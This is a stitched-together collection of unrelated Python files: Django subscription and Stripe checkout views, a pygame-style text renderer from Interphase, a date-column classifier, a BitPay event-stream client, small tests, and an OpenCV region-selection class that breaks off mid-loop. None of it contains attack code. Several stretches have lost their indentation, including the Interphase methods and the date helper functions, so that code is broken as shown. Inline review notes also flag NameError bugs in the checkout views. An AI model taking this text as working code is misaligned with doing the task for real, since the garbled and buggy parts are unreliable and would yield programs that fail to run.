        }
        return render(request, 'subscribe/subscribe.html', context)
    # Anonymous visitors see the packages without member context.
    return render(request, 'subscribe/subscribe.html', {'packages': packages})
@login_required
def add_package_to_cart(request, package_id):
    """Put a single subscription package in the session cart.

    The cart may only ever contain one subscription, so any previously
    selected package is discarded before the new one is added — this
    prevents a user who goes back and picks a different package from
    being charged for multiple subscriptions.

    :param package_id: primary key of the Package to add.
    """
    package = get_object_or_404(Package, pk=package_id)
    quantity = 1
    subscription_cart = request.session.get('subscription_cart', {})
    # Emptying first makes the add logic identical whether or not a package
    # was previously selected (the original duplicated the same if/else in
    # both branches). It also removed the unused `redirect_url` local.
    subscription_cart.clear()
    if package_id in subscription_cart:
        subscription_cart[package_id] += quantity
    else:
        subscription_cart[package_id] = quantity
    request.session['subscription_cart'] = subscription_cart
    return redirect(reverse('get_subscription', args=[package.id]))
@login_required
def get_subscription(request, package_id):
    """Render the subscription form and process its submission before
    payment completes. Credit to ckz8780 / Boutique Ado.

    GET: creates a Stripe PaymentIntent for the cart total and pre-fills
    the form from the member's saved details when available.
    POST: validates the form, creates the Member and Subscription records,
    then redirects to the confirmation page.
    """
    stripe_public_key = settings.STRIPE_PUBLIC_KEY
    stripe_secret_key = settings.STRIPE_SECRET_KEY
    member = Member.objects.filter(user=request.user)
    if member:
        messages.error(request, 'You already have a subscription.')
        return redirect(reverse('home'))
    package = get_object_or_404(Package, pk=package_id)
    if request.method == "POST":
        subscription_cart = request.session.get('subscription_cart', {})
        form_data = {
            'full_name': request.POST['full_name'],
            'email_address': request.POST['email_address'],
            'phone_number': request.POST['phone_number'],
            'cardholder_name': request.POST['cardholder_name'],
            'address_line1': request.POST['address_line1'],
            'address_line2': request.POST['address_line2'],
            'town_or_city': request.POST['town_or_city'],
            'county_or_region': request.POST['county_or_region'],
            'postcode': request.POST['postcode'],
            'country': request.POST['country'],
        }
        subscription_form = SubscriptionForm(form_data)
        if subscription_form.is_valid():
            subscription = subscription_form.save(commit=False)
            member = Member.objects.create(user=request.user)
            # The PaymentIntent id ties this subscription to its payment.
            pid = request.POST.get('client_secret').split('_secret')[0]
            subscription.stripe_pid = pid
            subscription.package_in_cart = json.dumps(subscription_cart)
            subscription.save()
            member.subscription_package = package
            if package.id == 3:
                # Package 3 is the VIP tier.
                member.is_vip = True
            # Collapsed the original's redundant double save into one.
            member.save()
            for package_id, package_data in subscription_cart.items():
                try:
                    package = Package.objects.get(id=package_id)
                    if isinstance(package_data, int):
                        subscription_count = SubscriptionCount(
                            subscription=subscription,
                            package=package,
                            quantity=package_data,
                        )
                        subscription_count.save()
                    else:
                        # Subscription packages do not have sizes or any other
                        # differentiating data, so package_data should always
                        # return an integer. In the unlikely event that it
                        # doesn't, the app throws this error, resets the cart
                        # and redirects the user
                        messages.error(request, 'We were unable to locate '
                                                'the subscription in our database. '
                                                'Please try again later.')
                        subscription.delete()
                        return redirect(reverse('subscribe_page'))
                except Package.DoesNotExist:
                    messages.error(request, 'We were unable to locate '
                                            'the subscription in our database. '
                                            'Please try again later.')
                    subscription.delete()
                    return redirect(reverse('subscribe_page'))
            request.session['save_member_info'] = 'save-member-info' in request.POST
            return redirect(reverse('subscription_confirmation',
                                    args=[subscription.subscription_id]))
        else:
            # NOTE(review): on an invalid form this falls through to the
            # context below, which references `intent` that only the GET
            # branch defines — that path raises NameError; confirm and fix.
            messages.error(request, 'There was an error submitting the form. '
                                    'Please ensure that you have filled out all fields '
                                    'correctly.')
    else:
        subscription_cart = request.session.get('subscription_cart', {})
        if not subscription_cart:
            # BUG FIX: removed a leftover debug print('hello').
            messages.error(request, "You didn't select a subscription")
            return redirect(reverse('subscribe_page'))
        current_cart = subscription_cart_contents(request)
        grand_total = current_cart['grand_total']
        stripe_total = round(grand_total * 100)  # Stripe amounts are in the minor unit
        stripe.api_key = stripe_secret_key
        intent = stripe.PaymentIntent.create(
            amount=stripe_total,
            currency=settings.STRIPE_CURRENCY,
        )
        if request.user.is_authenticated:
            try:
                # Pre-fill the form with the member's saved default details.
                member = Member.objects.get(user=request.user)
                subscription_form = SubscriptionForm(initial={
                    'full_name': member.user.get_full_name(),
                    'email_address': member.user.email,
                    'phone_number': member.default_phone_number,
                    'cardholder_name': member.user.get_full_name(),
                    'address_line1': member.default_address_line1,
                    'address_line2': member.default_address_line2,
                    'town_or_city': member.default_town_or_city,
                    'county_or_region': member.default_county_or_region,
                    'postcode': member.default_postcode,
                    'country': member.default_country,
                })
            except Member.DoesNotExist:
                subscription_form = SubscriptionForm()
        else:
            messages.error(request, 'You must have an account to get a '
                                    'subscription.')
            return redirect(reverse('home'))
    if not stripe_public_key:
        messages.warning(request, 'Your Stripe public key is missing. Please '
                                  'ensure that you have set this in your environment.')
    template = 'subscribe/get_subscription.html'
    context = {
        'subscription_form': subscription_form,
        'package': package,
        'stripe_public_key': stripe_public_key,
        'client_secret': intent.client_secret,
    }
    return render(request, template, context)
@login_required
def subscription_confirmation(request, subscription_id):
    """Confirms a successful subscription once user has submitted the form.

    Links the new Subscription to the requesting user's Member record and,
    when requested at checkout, saves the submitted details back onto the
    member profile.
    """
    save_member_info = request.session.get('save_member_info')
    subscription = get_object_or_404(Subscription, subscription_id=subscription_id)
    member = Member.objects.get(user=request.user)
    # Attach the subscription to the member created during checkout.
    subscription.member = member
    subscription.save()
    if save_member_info:
        member_data = {
            'subscription_package': subscription.subscription_package,
            'default_email_address': subscription.email_address,
            'default_phone_number': subscription.phone_number,
            'default_address_line1': subscription.address_line1,
            'default_address_line2': subscription.address_line2,
            'default_town_or_city': subscription.town_or_city,
            'default_county_or_region': subscription.county_or_region,
            'default_postcode': subscription.postcode,
            'default_country': subscription.country,
        }
        # NOTE(review): MembershipForm is never imported in this module (only
        # SubscriptionForm is) — reaching this branch raises NameError.
        # Confirm the intended form class and add the import.
        membership_form = MembershipForm(member_data, instance=member)
        if membership_form.is_valid():
            membership_form.save()
    messages.success(request, f'Your request was processed successfully. \
        Your subscription ID is {subscription_id}. A confirmation e-mail \
        will be sent to {subscription.email_address}.')
    template = 'subscribe/subscription_confirmation.html'
    context = {
        'subscription': subscription,
        'member': member,
    }
    return render(request, template, context)
@login_required
def cancel_subscription(request, user):
    """This view cancels a user's subscription by detaching its user"""
    # Deleting the Member record severs the subscription relationship.
    get_object_or_404(Member, user=request.user).delete()
    messages.success(request, 'Your subscription was successfully '
                              'cancelled. You will no longer be charged for '
                              'this package.')
    return redirect(reverse('home'))
|
#Interphase - Copyright (C) 2009 James Garnon <https://gatc.ca/>
#Released under the MIT License <https://opensource.org/licenses/MIT>
from __future__ import division
import os
try:
_set = set
except NameError:
from sets import Set as _set
from interphase.env import engine
__docformat__ = 'restructuredtext'
class Text(object):
    """
    Receives text to display on surface.
    Arguments include the target surface for text rendering, font_type is a list of alternate font names, and font_size is the font size.
    """
    # Class-level font registry shared by all instances:
    # maps font name -> {size: Font}, plus 'default'/'defaults' entries.
    _font = {}
    # Shared cache — presumably rendered-text surfaces keyed elsewhere
    # (populated by code outside this view); confirm in update().
    _cache = {}
def __init__(self, surface, font_type=None, font_size=None):
    """Initialize the text renderer for *surface*.

    :param surface: target surface for text rendering.
    :param font_type: font name or list of alternate font names; an entry
        of the form 'file:<path>' loads a font file directly.
    :param font_size: font size in points (defaults to 10).
    """
    self.screen = surface
    x, y = self.screen.get_size()
    self.dimension = {'x':x, 'y':y}
    self.message = None
    self.messages = []
    if font_size:
        self.font_size = int(font_size)
    else:
        self.font_size = 10
    if isinstance(font_type, str):
        font_type = [font_type]
    # First Text instance initializes the shared class-level font registry
    # and resolves the default font.
    if not Text._font:
        engine.font.init()
        font = None
        if font_type:
            font_type = ','.join(font_type)
            if font_type.startswith('file:'):
                # Explicit font file path.
                font = font_type[5:].strip()
                if not os.path.exists(font):
                    print('Font not found: %s' % font)
                    font = None
            else:
                font = engine.font.match_font(font_type)
        if not font:
            # Fall back to a list of common system fonts, then the
            # engine's built-in default.
            font_type = 'verdana, tahoma, bitstreamverasans, freesans, arial'
            font = engine.font.match_font(font_type)
            if not font:
                font = engine.font.get_default_font()
                font_type = font
        Text._font['default'] = font
        Text._font['defaults'] = font_type
        Text._font[font] = { self.font_size:engine.font.Font(font,self.font_size) }
        # Signal below that the requested font is already resolved.
        font_type = None
    if font_type:
        # Registry already initialized: resolve/cache the requested font.
        font_type = ','.join(font_type)
        if font_type != Text._font['defaults']:
            if font_type.startswith('file:'):
                font_type = font_type[5:].strip()
                if not os.path.exists(font_type):
                    print('Font not found: %s' % font_type)
                    font_type = None
            else:
                font_type = engine.font.match_font(font_type)
            if font_type:
                if font_type not in Text._font:
                    Text._font[font_type] = { self.font_size:engine.font.Font(font_type,self.font_size) }
            else:
                font_type = Text._font['default']
        else:
            font_type = Text._font['default']
    else:
        font_type = Text._font['default']
    # Ensure a Font object exists at the requested size.
    if self.font_size not in Text._font[font_type]:
        Text._font[font_type][self.font_size] = engine.font.Font(font_type,self.font_size)
    self.font_type = font_type
    self.font = Text._font[self.font_type]
    self.x = 0
    self.y = 0
    self.center = False                      # center-align flag
    self.font_color = (255,0,0)
    self.font_bgcolor = (0,0,0)
    self.split_text = False
    self.linesize = self.font[self.font_size].get_linesize()
    self.margin = {'t':0, 'r':0, 'b':0, 'l':0}
    self.multiline = False
    self.cache = None
    self.cache_key = None
def __call__(self, surface='default'):
    """Writes text to surface."""
    self.surface = self.screen if surface == 'default' else surface
    self.update()
    return self.surface
def render(self, surface='default'):
    """Writes text to surface."""
    self.surface = self.screen if surface == 'default' else surface
    self.update()
    return self.surface
def add(self,*message_append):
    """Append text fragments; each argument is stringified and stored."""
    texts = [str(item) for item in message_append]
    self.messages.extend(texts)
    if texts:
        # Track the most recently added fragment.
        self.message = texts[-1]
def set_position(self, position, center=False):
    """Set the text write position; return False if it lies off-surface."""
    x, y = position
    # Reject positions outside the surface; state is left untouched.
    if x >= self.dimension['x'] or y >= self.dimension['y']:
        return False
    self.x = x
    self.y = y
    if center:
        self.center = True
    return True
def set_text_alignment(self, setting):
    """Set text alignment. Setting is 'center' or 'left'; others ignored."""
    alignments = {'center': True, 'left': False}
    if setting in alignments:
        self.center = alignments[setting]
def set_margin(self, margin):
    """Set text margin: a single value, or a (top, right, bottom, left) tuple."""
    try:
        top, right, bottom, left = margin
    except TypeError:
        # Scalar: apply uniformly to all four sides.
        top = right = bottom = left = margin
    self.margin.update({'t': top, 'r': right, 'b': bottom, 'l': left})
def set_multiline(self, multiline=True):
    """Enable or disable multiline text rendering."""
    self.multiline = multiline
def set_font(self, font_type, default=False):
    """Set font of text.

    :param font_type: font name or list of names; 'default' restores the
        cached default font; a 'file:<path>' entry loads a font file.
    :param default: when True, also make the resolved font the class-wide
        default.
    """
    if isinstance(font_type, str):
        font_type = [font_type]
    font_type = ','.join(font_type)
    if font_type == 'default':
        font_type = Text._font['default']
        self.font = Text._font[font_type]
        self.font_type = font_type
    elif font_type != Text._font['defaults']:
        if font_type.startswith('file:'):
            font = font_type[5:].strip()
            if not os.path.exists(font):
                print('Font not found: %s' % font)
                font = None
        else:
            font = engine.font.match_font(font_type)
        if font:
            if font not in Text._font:
                # Lazily create and cache the Font object at the current size.
                Text._font[font] = { self.font_size:engine.font.Font(font,self.font_size) }
            self.font = Text._font[font]
            self.font_type = font
            if default:
                Text._font['default'] = font
                Text._font['defaults'] = font_type
    # Line height depends on the font; the rendered-text cache is invalidated.
    self.linesize = self.font[self.font_size].get_linesize()
    self.cache = None
def get_font(self, font_info='font'):
    """Get the current font ('font'), the default font ('default'),
    or the list of system fonts ('system')."""
    if font_info == 'font':
        return self.font_type
    if font_info == 'default':
        return Text._font['default']
    if font_info == 'system':
        return engine.font.get_fonts()
def get_font_size(self):
    """Get current font size in points."""
    return self.font_size
def set_font_size(self, size):
    """Set font size of text, creating and caching the Font object at that
    size on first use."""
    self.font_size = size
    if size not in Text._font[self.font_type]:
        Text._font[self.font_type][self.font_size] = engine.font.Font(self.font_type,self.font_size)
    self.font = Text._font[self.font_type]
    # Line height changes with size; invalidate the rendered-text cache.
    self.linesize = self.font[self.font_size].get_linesize()
    self.cache = None
def set_font_color(self, color):
"""Set font color of text."""
self.font_color = color
self.cache = None
def set_font_bgcolor(self, color=None):
"""Set font background color."""
self.font_bgcolor = color
self.cache = None
def set_split_text(self, split_text=True):
"""Set whether text split to new line at space."""
self.split_text = split_text
def check_size(self, text):
"""Get size required for given text."""
width, height = self.font[self.font_size].size(text)
return width, height
def check_sizes(self, texts):
"""Get size required for a list of texts."""
text_size = {}
for text in texts:
text_size[text] = self.check_size(text)
return text_size
def surface_size(self, *dim):
"""Surface size needed to fit text. Return estimated width for col and height for row, adjusted for margins."""
try:
col, row = dim[0], dim[1]
except IndexError:
col, row = dim[0]
sizes = [self.check_size(char)[0] for char in 'abcdefghijklmnopqrstuvwxyz ']
charsize = sum(sizes)//len(sizes)
width = (col*charsize) + (self.margin['l']+self.margin['r'])
height = ((row*self.linesize)-2) + (self.margin['t']+self.margin['b'])
return width, height
    def word_wrap(self, text, width):
        """Format text lines to fit in surface width, adjusted for margins.

        `text` may be a string (split on newlines) or a list of lines.
        Lines wider than the usable width are re-flowed at spaces; single
        words wider than the width are split by split_long_text. Returns
        the list of wrapped lines.
        """
        text_width = width - (self.margin['l']+self.margin['r'])
        if isinstance(text, list):
            textlines = text
        else:
            textlines = [line for line in text.splitlines()]
        txtlines = []
        line_num = 0
        # Width of a single space, used to account for inter-word gaps.
        space_size = self.check_size(' ')[0]
        while True:
            try:
                line = textlines[line_num]
            except IndexError:
                # All input lines consumed.
                break
            if self.check_size(line)[0] > text_width:
                words = line.split(' ')
                txt_line = []        # words accumulated for the current output line
                size_sum = 0         # pixel width of the accumulated words (no spaces)
                word_num = 0         # number of accumulated words
                for word in words:
                    word_size = self.check_size(word)[0]
                    if word_size > text_width:
                        # Word alone exceeds the line: flush the current
                        # line, then hard-split the word into chunks.
                        ln = self.split_long_text(word, text_width)
                        if txt_line:
                            txtlines.append(' '.join(txt_line))
                            txt_line = []
                            size_sum = 0
                            word_num = 0
                        txtlines.extend(ln)
                        continue
                    size_sum += word_size
                    # word_num gaps are needed to join word_num+1 words.
                    if size_sum + word_num*space_size <= text_width:
                        txt_line.append(word)
                        word_num += 1
                    else:
                        # Current word overflows: emit the line and start
                        # a new one with this word.
                        txtlines.append(' '.join(txt_line))
                        txt_line = []
                        txt_line.append(word)
                        size_sum = word_size
                        word_num = 1
                if txt_line:
                    # Flush the trailing partial line.
                    txtlines.append(' '.join(txt_line))
            else:
                # Line already fits; keep as-is.
                txtlines.append(line)
            line_num += 1
        return txtlines
    def split_long_text(self, text, width):
        """Split long text uninterrupted by spaces to fit in surface width.

        Returns a list of substrings, each no wider than `width` pixels.
        """
        # _set: module-level helper — presumably an alias of the builtin
        # set (TODO confirm); measures each distinct character only once.
        char_size = self.check_sizes(_set(text))
        ln = []          # completed chunks
        chars = []       # characters of the chunk being built
        size_sum = 0     # pixel width of the chunk being built
        for char in text:
            size_sum += char_size[char][0]
            if size_sum <= width:
                chars.append(char)
            else:
                # Chunk full: emit it and start a new one with this char.
                ln.append(''.join(chars))
                chars = []
                chars.append(char)
                size_sum = char_size[char][0]
        if chars:
            # Flush the trailing partial chunk.
            ln.append(''.join(chars))
        return ln
def has_text(self):
"""Check whether contains text."""
if self.messages:
return True
else:
return False
def clear_text(self):
"""Clear text."""
self.message = None
self.messages = []
    def _cache_chr(self, ch):
        """Render glyph `ch` and store its surface and width in the cache."""
        if self.font_bgcolor:
            text_surface = self.font[self.font_size].render(ch, True, self.font_color, self.font_bgcolor)
        else:
            text_surface = self.font[self.font_size].render(ch, True, self.font_color)
        try:
            self.cache[ch] = {'image':text_surface, 'width':text_surface.get_width()}
        except TypeError:
            # self.cache was None (invalidated): rebind it to the shared
            # per-style cache keyed by font, size and colors, creating
            # the entry on first use, then store the glyph.
            self.cache_key = self.font_type + str(self.font_size) + str(self.font_color) + str(self.font_bgcolor)
            if self.cache_key not in self._cache:
                self._cache[self.cache_key] = {}
            self.cache = self._cache[self.cache_key]
            self.cache[ch] = {'image':text_surface, 'width':text_surface.get_width()}
def _get_width(self, text):
width = 0
for ch in text:
try:
width += self.cache[ch]['width']
except (KeyError, TypeError):
self._cache_chr(ch)
width += self.cache[ch]['width']
return width
    def tprint(self):
        """Print text to surface.

        Renders queued messages glyph by glyph: either as a single line
        (optionally split at spaces, one word per line) when multiline is
        off, or one queued message per line when multiline is on. Honors
        center/left alignment and margins, then clears the queue.
        """
        if self.messages != []:
            if not self.cache:
                # Bind the shared glyph cache for the current style.
                self.cache_key = self.font_type + str(self.font_size) + str(self.font_color) + str(self.font_bgcolor)
                if self.cache_key not in self._cache:
                    self._cache[self.cache_key] = {}
                self.cache = self._cache[self.cache_key]
            if not self.multiline:
                text = " ".join(self.messages)
                if not self.split_text or text.strip().count(' ') == 0:
                    # Single line at self.y, starting from centered or
                    # left-margined x.
                    if self.center:
                        width = self._get_width(text)
                        x = self.x - (width//2)
                    else:
                        x = self.x + self.margin['l']
                    for ch in text:
                        if ch not in self.cache:
                            self._cache_chr(ch)
                        self.surface.blit(self.cache[ch]['image'], (x,self.y))
                        x += self.cache[ch]['width']
                else:
                    # Split at spaces: one word per line, block centered
                    # vertically around self.y.
                    words = text.count(' ')
                    position_y = self.y - words*(self.linesize//2) - 1
                    texts = text.split(' ')
                    for count, text in enumerate(texts):
                        if self.center:
                            width = self._get_width(text)
                            x = self.x - (width//2)
                            y = position_y + (count*self.linesize)
                        else:
                            x = self.x
                            y = position_y + (count*self.linesize)
                        for ch in text:
                            if ch not in self.cache:
                                self._cache_chr(ch)
                            self.surface.blit(self.cache[ch]['image'], (x,y))
                            x += self.cache[ch]['width']
            else:
                # Multiline: one queued message per line from the top margin.
                position_y = self.y + self.margin['t']
                for count, text in enumerate(self.messages):
                    if self.center:
                        width = self._get_width(text)
                        x = self.x - (width//2)
                        y = position_y + (count*self.linesize)
                    else:
                        x = self.x + self.margin['l']
                        y = position_y + (count*self.linesize)
                    for ch in text:
                        if ch not in self.cache:
                            self._cache_chr(ch)
                        self.surface.blit(self.cache[ch]['image'], (x,y))
                        x += self.cache[ch]['width']
        # Queue is consumed once rendered.
        self.message = None
        self.messages = []
    def update(self):
        """Render queued text to the surface (delegates to tprint)."""
        self.tprint()
def load_image(filename, frames=1, path='data', zipobj=None, fileobj=None, colorkey=None, errorhandle=True):
    """
    Load image from file.

    Arguments include the image filename, the number of image frames in an
    image strip, the image path, zipobj for image in a zip file, fileobj for
    image in a file-like object, image colorkey, and errorhandle for
    exception handling.

    Returns a single converted surface when frames == 1, a list of frame
    surfaces when frames > 1, and None otherwise. On load failure the
    engine error is re-raised when errorhandle is set, else IOError.
    """
    def convert_image(image, colorkey):
        # Convert to display format, preserving per-pixel alpha if present.
        if image.get_alpha():
            image = image.convert_alpha()
        else:
            image = image.convert()
        if colorkey is not None:
            if colorkey == -1:
                # colorkey -1 means: sample the top-left pixel.
                colorkey = image.get_at((0,0))
            image.set_colorkey(colorkey, engine.RLEACCEL)
        return image
    if zipobj:
        import zipfile
        try:
            from io import BytesIO
        except ImportError:      # Python 2 fallback
            from StringIO import StringIO as BytesIO
        if isinstance(zipobj, str):
            # zipobj is an archive filename: open it ourselves and close it
            # deterministically even if the read raises (the original
            # leaked the ZipFile on exception).
            if path:
                data_file = os.path.join(path, zipobj)
            else:
                data_file = zipobj
            with zipfile.ZipFile(data_file) as dat:
                fileobj = BytesIO(dat.open(filename).read())
        else:
            # zipobj is an already-open ZipFile managed by the caller.
            fileobj = BytesIO(zipobj.open(filename).read())
        full_name = fileobj
        namehint = filename
    elif fileobj:
        full_name = fileobj
        namehint = filename
    else:
        if path:
            full_name = os.path.join(path, filename)
        else:
            full_name = filename
        namehint = ''
    try:
        if frames == 1:
            image = engine.image.load(full_name, namehint)
            image = convert_image(image, colorkey)
            return image
        elif frames > 1:
            # Image strip: slice `frames` equal-width frames left to right.
            images = []
            image = engine.image.load(full_name, namehint)
            width, height = image.get_size()
            width = width // frames
            for frame in range(frames):
                frame_num = width * frame
                image_frame = image.subsurface((frame_num,0,width,height)).copy()
                image_frame.set_alpha(image.get_alpha())
                image_frame = convert_image(image_frame, colorkey)
                images.append(image_frame)
            return images
    except engine.error:
        if errorhandle:
            raise
        else:
            raise IOError
    # frames < 1: nothing to load.
    return None
|
"""
Copyright 2020 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
This module will detect the type(Consistent, all ambiguous, inconsistent column)
a passed column is & also wether day_first is True/False for that column.
"""
import datetime
import pandas
from util import enums
def get_column_type_and_order(column):
    """
    Classify the column into one of three types based on its values and
    report the day/month order.

    Args:
        column: list of date entries (strings or ints).
    Returns:
        dict {'type': ..., 'day_first': ...} where 'type' is an attribute of
        enums.ColumnTypes (e.g. ColumnTypes.CONSISTENT) and 'day_first' is
        True/False for a consistent column, None otherwise.
    """
    entries = [str(entry) for entry in column]
    # Tally of interpretations: True/False for unambiguous day-first /
    # month-first dates, None for ambiguous dates.
    counts = {True: 0, False: 0, None: 0}
    for date in entries:
        # A date is ambiguous when swapping day and month yields a
        # different (still valid) parse, or when day equals month.
        ambiguous = (_to_datetime(date, True) != _to_datetime(date, False) or
                     _to_datetime(date, True).month == _to_datetime(date, True).day)
        if ambiguous:
            counts[None] += 1
        elif _is_day_first(date):
            counts[True] += 1
        else:
            counts[False] += 1
    if counts[True] and counts[False]:
        # Both orders observed: column is inconsistent.
        return {'type': enums.ColumnTypes.INCONSISTENT, 'day_first': None}
    if counts[True]:
        return {'type': enums.ColumnTypes.CONSISTENT, 'day_first': True}
    if counts[False]:
        return {'type': enums.ColumnTypes.CONSISTENT, 'day_first': False}
    return {'type': enums.ColumnTypes.ALL_AMBIGUOUS, 'day_first': None}
def _is_day_first(date):
    """
    This function looks into the date(string) and decides if
    day occurs first in it. Date passed should be unambiguous.
    Args :
        date - Type string
    Returns :
        Bool - True if day occurs before month.
    """
    date_datetime = _to_datetime(date, None)
    # Removing time from the date.
    # Here it is assumed that time is present in the form '%H:%M:%S';
    # other possible time formats can be added to the list possible_times.
    date_without_time = date
    possible_times = [_to_str(date_datetime.hour) + ':' +
                      _to_str(date_datetime.minute) + ':' +
                      _to_str(date_datetime.second)]
    if date.find(possible_times[0]) != -1:
        date_without_time = date.replace(possible_times[0], '')
    date = date_without_time
    # Removing year from the date.
    # Only the last 2 digits of the year may be present —
    # e.g. sometimes 1998 is represented as 98.
    date_without_year = date
    # List of possible year spellings mentioned in the date.
    possible_years = [str(date_datetime.year), str(date_datetime.year % 100)]
    if date.find(possible_years[0]) != -1:
        date_without_year = date.replace(possible_years[0], '')
    else:
        date_without_year = date.replace(possible_years[1], '')
    date = date_without_year
    # Now that both time and year are removed from the date string, only
    # day and month remain: compare their positions.
    return date.find(str(date_datetime.day)) < date.find(str(date_datetime.month))
def _to_str(num):
"""
This function converts the number passed to a string,
it just adds a '0' if number passed is of single digit.
Args :
num - int
Returns :
string
"""
if num < 10:
return '0' + str(num)
else:
return str(num)
def _to_datetime(date, day_first):
"""
As pandas to_datetime returns a timestramp - this function converts it to
a datetime object using the strptime method.
Args :
date - string representing date
day_first - Bool/None
Argument required to parse ambiguous dates.
Returns :
date as a datetime object
"""
# converting str date to a timestamp format ex- '2019-08-05 17:51:29'
date_timestamp = str(pandas.to_datetime(date, dayfirst=day_first))
# converting the timestamp to datetime object
date_datetime = datetime.datetime.strptime(date_timestamp,
'%Y-%m-%d %H:%M:%S')
return date_datetime
|
#!/usr/bin/env python
import json
import requests
import threading
from retrying import retry
# BitPay server-sent-events endpoint.
EVENT_ENDPOINT = 'https://bitpay.com/events'
# SSE streams use the text/event-stream content type.
CONTENT_TYPE_HEADER = {'content-type': 'text/event-stream'}
# %% is an escaped percent for %-formatting; the rendered query is
# action=subscribe&events%5B%5D=payment&token=<token>.
SUBSCRIBE_QUERY = 'action=subscribe&events%%5B%%5D=payment&token=%s'
# Invoice status values reported through the callback.
STATUS_FIELD = 'status'
STATUS_EXPIRED = 'expired'
STATUS_PAID = 'paid'
STATUS_NO_CONNECTION = 'no connection'
class BitPayEventSource(threading.Thread):
    """Background thread that subscribes to BitPay's server-sent-events
    stream and reports invoice status changes through a callback.

    The callback receives one of STATUS_EXPIRED, STATUS_PAID or
    STATUS_NO_CONNECTION.
    """
    def __init__(self, token, callback, event_endpoint = EVENT_ENDPOINT,
                 retrying = True):
        # token: invoice token used to authorize the subscription.
        # callback: callable invoked with a status string.
        # retrying: when True, reconnect with exponential backoff.
        super(BitPayEventSource, self).__init__()
        self.token = token
        self.callback = callback
        self.event_endpoint = event_endpoint
        self.retrying = retrying
        self.is_active = True
    def run(self):
        """Thread body: connect once, or keep retrying with backoff."""
        if self.retrying:
            self.connect_with_retrying()
        else:
            try:
                self.connect()
            except requests.ConnectionError:
                self.callback(STATUS_NO_CONNECTION)
    def stop(self):
        """Ask the streaming loop to terminate at the next received line."""
        self.is_active = False
    @retry(wait_exponential_multiplier=250, wait_exponential_max=30000) # ms
    def connect_with_retrying(self):
        """Connect, retried with exponential backoff on any exception."""
        self.connect()
    def connect(self):
        """Open the SSE stream and dispatch invoice status events.

        NOTE(review): on Python 3, iter_lines yields bytes, so the
        `':' not in line` check would raise TypeError — confirm this
        module only runs under Python 2, or decode the lines.
        """
        if not self.is_active:
            return
        params = SUBSCRIBE_QUERY % self.token
        r = requests.get(self.event_endpoint, headers=CONTENT_TYPE_HEADER,
                         params=params, stream=True)
        for line in r.iter_lines(chunk_size=1):
            if not self.is_active:
                break
            if ':' not in line:
                continue
            # SSE frames are "field: value"; only "data" frames matter here.
            (field, value) = line.strip().split(':', 1)
            field = field.strip()
            if field != "data":
                continue
            try:
                j = json.loads(value)
                if not STATUS_FIELD in j:
                    continue
                if j[STATUS_FIELD] == STATUS_EXPIRED:
                    self.callback(STATUS_EXPIRED)
                if j[STATUS_FIELD] == STATUS_PAID:
                    self.callback(STATUS_PAID)
            except ValueError:
                # Non-JSON data payload: ignore.
                pass
|
# Testing module instance_type.i2
import pytest
import ec2_compare.internal.instance_type.i2
def test_get_internal_data_instance_type_i2_get_instances_list():
    """The generated i2 instance list must be non-empty."""
    assert len(ec2_compare.internal.instance_type.i2.get_instances_list()) > 0
def test_get_internal_data_instance_type_i2_get():
    """The generated i2 `get` mapping must be non-empty."""
    assert len(ec2_compare.internal.instance_type.i2.get) > 0
|
# Library imports
from urllib.request import urlopen, FancyURLopener, Request
class TWURLOpener(FancyURLopener):
    """URL opener that identifies itself as "PyTwitch".

    NOTE(review): FancyURLopener has been deprecated since Python 3.3 —
    consider urllib.request.Request with a User-Agent header instead.
    """
    # Sent as the User-Agent string on requests.
    version = "PyTwitch"
|
#!/usr/bin/env python
#import freenect
import numpy as np
import cv2
import time
from matplotlib import pyplot as plt
import copy
# calibrate kinect to world
# https://github.com/amiller/libfreenect-goodies/blob/master/calibkinect.py
# also check out mouse_and_match
class User_ROI_Selection:
    """Interactive rectangular region-of-interest selector using OpenCV
    HighGUI mouse callbacks.

    NOTE(review): written for Python 2 (print statements); porting to
    Python 3 requires print() calls.
    """
    NUM_FRAMES = 0
    IMAGE_ARRAY = None
    FRAMES_TO_AVERAGE = 10
    # initialize the list of reference points and boolean indicating
    # whether cropping is being performed or not
    refPt = []
    cropping = False
    image = None
    interacting = False
    def __init__(self, image):
        # Image (BGR array) the user will select a region from.
        self.image = image
    def blurred_edge(self, image, blur_index):
        """Return a Canny edge map of the grayscale, blurred image."""
        # convert the image to grayscale, blur it, and find edges
        # in the image
        gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        gray = cv2.bilateralFilter(gray, 11, 17, 17)
        gray = cv2.blur(gray,(blur_index,blur_index))
        edged = cv2.Canny(gray, 30, 200)
        return edged
    def click_and_crop(self, event, x, y, flags, param):
        """Mouse callback: record press/release corners, draw the
        selection rectangle, and display the cropped region."""
        # print "Event, ", event
        # print "refpt, ", self.refPt
        # grab references to the global variables
        # refPt = self.refPt
        cropping = self.cropping
        # if the left mouse button was clicked, record the starting
        # (x, y) coordinates and indicate that cropping is being
        # performed
        if event == cv2.EVENT_LBUTTONDOWN:
            print "Cropping"
            self.refPt = [(x, y)]
            cropping = True
        # check to see if the left mouse button was released
        elif event == cv2.EVENT_LBUTTONUP:
            print "Released"
            # record the ending (x, y) coordinates and indicate that
            # the cropping operation is finished
            self.refPt.append((x, y))
            cropping = False
            print "refpt, ", self.refPt
            # draw a rectangle around the region of interest
            if len(self.refPt) == 2:
                img_copy = self.image.copy()
                cv2.rectangle(img_copy, self.refPt[0], self.refPt[1], (155, 167, 120), 5)
                cv2.imshow("image copy", img_copy)
                # if there are two reference points, then crop the region of interest
                # from the image and display it
                print "Displaying cropped image"
                roi = self.image[self.refPt[0][1]:self.refPt[1][1], self.refPt[0][0]:self.refPt[1][0]]
                cv2.imshow("ROI", roi)
                cv2.waitKey(1)
                # reset for the next selection
                self.refPt = []
    def user_selection(self):
        """Display the image and loop on key events until 'c' is pressed.

        Keys: 'r' resets the image, 'c' confirms and exits, 's' is a
        placeholder for saving.
        """
        # have user define and show region of interest
        # load the image, clone it, and setup the mouse callback function
        image = self.image
        clone = image.copy()
        cv2.namedWindow("image")
        cv2.setMouseCallback("image", self.click_and_crop)
        # keep looping until the 'q' key is pressed
        while True:
            # display the image and wait for a keypress
            cv2.imshow("image", image)
            key = cv2.waitKey(1) & 0xFF
